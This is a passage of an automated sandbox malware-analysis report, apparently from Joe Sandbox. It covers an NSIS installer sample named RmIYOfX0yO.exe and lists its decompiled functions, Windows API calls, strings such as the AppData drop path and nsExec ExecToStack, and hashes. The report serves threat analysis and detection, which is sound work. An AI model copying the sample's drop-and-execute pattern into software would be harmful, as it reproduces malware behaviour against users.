GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004062E6
GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004062F9
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406335
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406343
CoTaskMemFree.OLE32(?), ref: 0040634E
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406372
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 004063CC

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040636C
: Completed, xrefs: 004061CF, 004062AF, 004062D0, 004062E5, 004062F8, 00406314, 0040633F, 00406371, 00406377, 00406391, 004063A5, 004063C5, 004063CB, 004063D7, 0040640A
Completed, xrefs: 004061CA
Software\Microsoft\Windows\CurrentVersion, xrefs: 004062B4

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-905382516
Opcode ID: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
Instruction ID: 0f73e779dd6c4db66e797802c36dad016b528f10de9f6072c808280cb7245e7c
Opcode Fuzzy Hash: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
Instruction Fuzzy Hash: 9361F271A00105EBDB209F25CD41AAE37A5AF50314F16807FFD46BA2D0D73D89A2CB9D

Function 00405974 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 0040599D
lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 004059E5
lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405A08
lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405A0E
FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405A1E
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,0000002E), ref: 00405ABE
FindClose.KERNEL32(00000000), ref: 00405ACD

Strings

PWB, xrefs: 004059CD
"C:\Users\user\Desktop\RmIYOfX0yO.exe", xrefs: 0040597D
\*.*, xrefs: 004059DF
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405A5E

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\RmIYOfX0yO.exe"$Error writing temporary file. Make sure your temp folder is valid.$PWB$\*.*
API String ID: 2035342205-629741633
Opcode ID: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
Instruction ID: d49c34b76256c1d29f4337415f4183e275b3e80d30968624801757685f99445f
Opcode Fuzzy Hash: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
Instruction Fuzzy Hash: E041B130A00A14EADB21AB618D89BAF7778DF41764F20427FF805B51D2D77C5982CE6E

Function 00406847 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
Instruction ID: 5555e847f210990d4306c473702a26b4278c0affe79ec1256b97cb42bd71170f
Opcode Fuzzy Hash: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
Instruction Fuzzy Hash: 60F17671D04229CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7785A86CF45

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\magmaet\clenched
API String ID: 542301482-536943358
Opcode ID: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
Instruction ID: 385f74efd5c92971cc76d3b11bce30356dc3a3525802f9592d77ec9fc6b050a7
Opcode Fuzzy Hash: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
Instruction Fuzzy Hash: E5412C75A00209AFCF00DFA4CD88AAD7BB5FF48314B20457AF915EB2D1DBB99A41CB54

Function 004064C6 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0), ref: 004064D1
FindClose.KERNEL32(00000000), ref: 004064DD

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
Instruction ID: 6f39d47423a9e3911ec825e8889a8cd4e4dbe9a09c05077791626206cca478a1
Opcode Fuzzy Hash: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
Instruction Fuzzy Hash: FED012715151209BC2901B787F0C85B7A989F553317128E36F46AF22E0C738CC67869C

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
Instruction ID: f51a3655aa6281515c31db2bfa725e220f35cee11171475ca2a169fd8dd427bf
Opcode Fuzzy Hash: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
Instruction Fuzzy Hash: 09F05E716001149BC711EBA4DE49AAEB374EF04324F10057BE515E31E1D6B499459B2A

Function 00403D6F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DAB
ShowWindow.USER32(?), ref: 00403DC8
DestroyWindow.USER32 ref: 00403DDC
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF8
GetDlgItem.USER32(?,?), ref: 00403E19
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E2D
IsWindowEnabled.USER32(00000000), ref: 00403E34
GetDlgItem.USER32(?,00000001), ref: 00403EE2
GetDlgItem.USER32(?,00000002), ref: 00403EEC
SetClassLongW.USER32(?,000000F2,?), ref: 00403F06
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F57
GetDlgItem.USER32(?,00000003), ref: 00403FFD
ShowWindow.USER32(00000000,?), ref: 0040401E
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404030
EnableWindow.USER32(?,?), ref: 0040404B
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404061
EnableMenuItem.USER32(00000000), ref: 00404068
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404080
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404093
lstrlenW.KERNEL32(00423748,?,00423748,00429260), ref: 004040BC
SetWindowTextW.USER32(?,00423748), ref: 004040D0
ShowWindow.USER32(?,0000000A), ref: 00404204

Strings

H7B, xrefs: 004040A8

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: H7B
API String ID: 3282139019-2300413410
Opcode ID: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
Instruction ID: 25c141fc174ea51021f963d75397c5770897fb54822066ed0df1b6b59a0401a8
Opcode Fuzzy Hash: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
Instruction Fuzzy Hash: EFC1CFB1644200FBDB216F61EE84D2B7B78EB98745F40097EF641B51F0CB3998529B2E

Function 004039CC Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586

lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00403A4D
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,756F3420), ref: 00403ACD
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403AE0
GetFileAttributesW.KERNEL32(: Completed), ref: 00403AEB
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\magmaet\clenched), ref: 00403B34

Part of subcall function 004060CA: wsprintfW.USER32 ref: 004060D7

RegisterClassW.USER32(00429200), ref: 00403B71
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B89
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BBE
ShowWindow.USER32(00000005,00000000), ref: 00403BF4
GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403C20
GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403C2D
RegisterClassW.USER32(00429200), ref: 00403C36
DialogBoxParamW.USER32(?,00000000,00403D6F,00000000), ref: 00403C55

Strings

.DEFAULT\Control Panel\International, xrefs: 00403A38
C:\Users\user\AppData\Local\Temp\, xrefs: 004039D1
RichEdit, xrefs: 00403C27
_Nb, xrefs: 00403B50, 00403BB8
RichEd20, xrefs: 00403BFA
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00403A5C, 00403A64, 00403B07, 00403B0D, 00403B1D
.exe, xrefs: 00403ADA
RichEdit20W, xrefs: 00403C18, 00403C1E
: Completed, xrefs: 00403A94, 00403A9D, 00403AAB, 00403AFA, 00403B00
"C:\Users\user\Desktop\RmIYOfX0yO.exe", xrefs: 004039CF
RichEd32, xrefs: 00403C08
Control Panel\Desktop\ResourceLocale, xrefs: 00403A00
1033, xrefs: 004039EC, 00403A48
H7B, xrefs: 004039F8

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\RmIYOfX0yO.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2320600929
Opcode ID: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
Instruction ID: 56c0b88d72ef28cc24ab3b3da6b812fbe5e4610ed82a7e8ff487d4c0aa16eca4
Opcode Fuzzy Hash: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
Instruction Fuzzy Hash: E261C270240600BAD720AF66AD45F2B3A7CEB84B09F40447EF945B22E2DB7D69118A3D

Function 00402E41 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402E55
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RmIYOfX0yO.exe,00000400), ref: 00402E71

Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00405D5C
Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RmIYOfX0yO.exe,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00402EBA
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403001

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402E4B, 00403019
C:\Users\user\Desktop\RmIYOfX0yO.exe, xrefs: 00402E5B, 00402E6A, 00402E7E, 00402E9B
Inst, xrefs: 00402F28
"C:\Users\user\Desktop\RmIYOfX0yO.exe", xrefs: 00402E4A
Null, xrefs: 00402F3A
C:\Users\user\Desktop, xrefs: 00402E9C, 00402EA1, 00402EA7
soft, xrefs: 00402F31
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040304A
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403098
Error launching installer, xrefs: 00402E91

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\RmIYOfX0yO.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RmIYOfX0yO.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3382077929
Opcode ID: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
Instruction ID: 78d4ac72044dd1d4b64dcf5cb9e774c3474f7f20f7d9c099438d2fbc404b67ba
Opcode Fuzzy Hash: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
Instruction Fuzzy Hash: 6961E231900215AFDB209F75DD49B9E7AB8AB04359F20817FFA00B62C1CBB99A458B5D

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched,?,?,00000031), ref: 004017CD

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Strings

C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00401796
artikulationer\Udsorteringerne, xrefs: 00401819, 00401837
C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll, xrefs: 0040182D, 00401849
ExecToStack, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE

Memory Dump Source

